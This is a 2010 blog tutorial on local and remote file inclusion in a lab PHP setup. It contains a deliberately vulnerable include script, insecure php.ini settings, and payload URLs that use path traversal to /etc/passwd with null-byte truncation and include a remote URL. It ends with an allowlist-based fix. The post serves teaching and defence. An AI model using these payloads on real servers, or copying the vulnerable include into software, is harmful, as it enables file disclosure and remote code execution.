Playing around with Local and Remote file inclusions…

May 27, 2010 at 10:54 am (LFI / RFI, PHP, Programming, Security)

Hey all,

So, with my recent research into web application security, I have been playing around with local and remote file inclusions on my local web server 😉 A couple of things to note so that an LFI or RFI actually works when you try it in the lab:

1) Make sure magic quotes are off, so you're able to include said files. magic_quotes_gpc puts a backslash in front of quotes, backslashes and NUL bytes in incoming GET/POST/cookie data, so a %00 on the end of a parameter reaches the script as the two characters \0 and the null-byte trick described further down no longer works (the setting was deprecated in PHP 5.3 and removed in 5.4):

; Magic quotes for incoming GET/POST/Cookie data.
magic_quotes_gpc = Off

Otherwise you will get an error similar to this when trying to include files:

Warning: include(http://www.google.com/.php) [function.include]: failed to open stream: HTTP request failed! HTTP/1.0 404 Not Found in /var/www/testing/vuln.php on line 5

Warning: include() [function.include]: Failed opening 'http://www.google.com/.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/testing/vuln.php on line 5

That is magic quotes kicking in: the NUL byte is escaped instead of terminating the string, so the '.php' suffix is still appended and PHP goes looking for a page that does not exist. Make sure you turn it off before playing with these techniques!

2) For remote file inclusion you also need allow_url_fopen and allow_url_include set to On (a local include needs neither; allow_url_include has defaulted to Off since it was introduced in PHP 5.2, and outside a test box it should stay that way):

; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
allow_url_fopen = On

; Whether to allow include/require to open URLs (like http:// or ftp://) as files.
allow_url_include = On

Or you will get an error that looks similar to:

Warning: include() [function.include]: URL file-access is disabled in the server configuration in /var/www/testing/vuln.php on line 5

Warning: include(http://www.google.com/) [function.include]: failed to open stream: no suitable wrapper could be found in /var/www/testing/vuln.php on line 5

Warning: include() [function.include]: Failed opening 'http://www.google.com/' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/testing/vuln.php on line 5

Now you should be able to play around with LFI/RFI with no issues. Consider the following example:

root@bt:/var/www/testing# ls -l
total 16
-rw-r--r-- 1 root root 33 May 27 10:48 blue.php
-rw-r--r-- 1 root root 20 May 27 10:43 phpinfo.php
-rw-r--r-- 1 root root 32 May 27 10:48 red.php
-rw-r--r-- 1 root root 297 May 27 10:44 vuln.php
root@bt:/var/www/testing# cat vuln.php
<?php
$color = 'blue';
if (isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
include( $color . '.php' );
?>

<form method="get">
<select name="COLOR">
<option value="red">red</option>
<option value="blue">blue</option>
</select>
<input type="submit">
</form>

root@bt:/var/www/testing# cat blue.php red.php
<?php echo "testing blue..."; ?>
<?php echo "testing red..."; ?>
root@bt:/var/www/testing#

Go to http://localhost/testing/vuln.php, then play around with the form for a bit (it shouldn't take you too long, it's a very simple and contrived example 😉 ) and keep your eye on the variable in the URL bar. Remember that the script appends '.php' to whatever you pass, so to pull in phpinfo.php you pass phpinfo, not phpinfo.php. Try things like this:

http://localhost/testing/vuln.php?COLOR=phpinfo
http://localhost/testing/vuln.php?COLOR=../../../../../etc/passwd%00
http://localhost/testing/vuln.php?COLOR=http://www.google.com/%00

Why the %00 on the end, you may ask?

Well, that is to put a NUL byte at the end of the string. The path ends up in a C string inside PHP, which stops at the first NUL, so everything the script appends after your input (the hard-coded '.php') is ignored. Without it, something like this happens:

Warning: include(http://www.google.com/.php) [function.include]: failed to open stream: HTTP request failed! HTTP/1.0 404 Not Found in /var/www/testing/vuln.php on line 5

Warning: include() [function.include]: Failed opening 'http://www.google.com/.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/testing/vuln.php on line 5

From that it should be pretty clear why you need to append the %00: notice the 'http://www.google.com/.php', which is constructed from:

include( $color . '.php' );

with $color set to 'http://www.google.com/', so the argument becomes 'http://www.google.com/' . '.php', i.e. 'http://www.google.com/.php'.

As the page http://www.google.com/.php does not exist, it throws an error, which is why you must append a NULL to the end of your URL/file/string/etc. One caveat: this only works on PHP older than 5.3.4. From that release onwards include() and the other filesystem functions reject any path containing a NUL byte, so the truncation trick is gone and the hard-coded suffix actually sticks.
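To tie the vuln.php listing and the %00 explanation together, here is an added example (my own code, not from the original post) that replays the $color . '.php' construction for the three payloads above, models what the NUL byte, magic_quotes_gpc and the PHP 5.3.4 NUL check each do to the resulting path, and shows an allowlist-based replacement for the vulnerable include. It assumes the post's lab layout (/var/www/testing with red.php, blue.php and phpinfo.php); the function names are mine.

```php
<?php
// Added example, not code from the original post. Replays vuln.php's
// $color . '.php' construction for the post's three payloads, models what the
// NUL byte, magic_quotes_gpc and the PHP 5.3.4 NUL check do to the path, and
// shows an allowlist-based replacement for the vulnerable include().
// Assumed lab layout: /var/www/testing with red.php, blue.php, phpinfo.php.

// The string vuln.php hands to include() for a given COLOR value.
function vulnerable_target($color)
{
    return $color . '.php';
}

// PHP before 5.3.4 passed the path to the C runtime as a NUL-terminated
// string, so everything after the first NUL byte was silently dropped.
function opened_by_old_php($path)
{
    $nul = strpos($path, "\0");
    return $nul === false ? $path : substr($path, 0, $nul);
}

// PHP 5.3.4 and later refuse a path containing NUL before opening anything.
function accepted_by_modern_php($path)
{
    return strpos($path, "\0") === false;
}

// Hardened replacement for vuln.php's include: the parameter is used only as
// a key into a fixed allowlist, so neither '..', a URL nor a NUL byte can ever
// reach include(). Unknown values fall back to the default and are not echoed.
function safe_target($color, $base = '/var/www/testing')
{
    static $pages = array('red' => 'red.php', 'blue' => 'blue.php');
    if (!is_string($color) || !isset($pages[$color])) {
        $color = 'blue';
    }
    return $base . DIRECTORY_SEPARATOR . $pages[$color];
}

// The payloads from the post, exactly as they appear in the URL.
$payloads = array(
    'phpinfo',                        // local include of another script in the web root
    '../../../../../etc/passwd%00',   // traversal; the NUL is meant to chop off '.php'
    'http://www.google.com/%00',      // remote include; needs allow_url_include = On
);

foreach ($payloads as $raw) {
    $color   = rawurldecode($raw);    // $_GET['COLOR'] with magic quotes off
    $escaped = addslashes($color);    // $_GET['COLOR'] with magic_quotes_gpc = On (NUL -> \0)
    $target  = vulnerable_target($color);

    printf("COLOR=%s\n", $raw);
    printf("  string passed to include():   %s\n", addcslashes($target, "\0"));
    printf("  PHP < 5.3.4 actually opens:   %s\n", opened_by_old_php($target));
    printf("  PHP >= 5.3.4 accepts it:      %s\n", accepted_by_modern_php($target) ? 'yes' : 'no, NUL in path');
    printf("  with magic_quotes_gpc = On:   %s\n", vulnerable_target($escaped));
    printf("  hardened script includes:     %s\n\n", safe_target($color));
}
```

Run it from the command line with php; it never calls include() itself, it only shows the strings that would reach it. The allowlist in safe_target() is the whole defence: the user value is never used as a path, so allow_url_include can (and should) go back to Off once you are done playing, and no amount of %00 or ../ in COLOR changes which file gets loaded.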
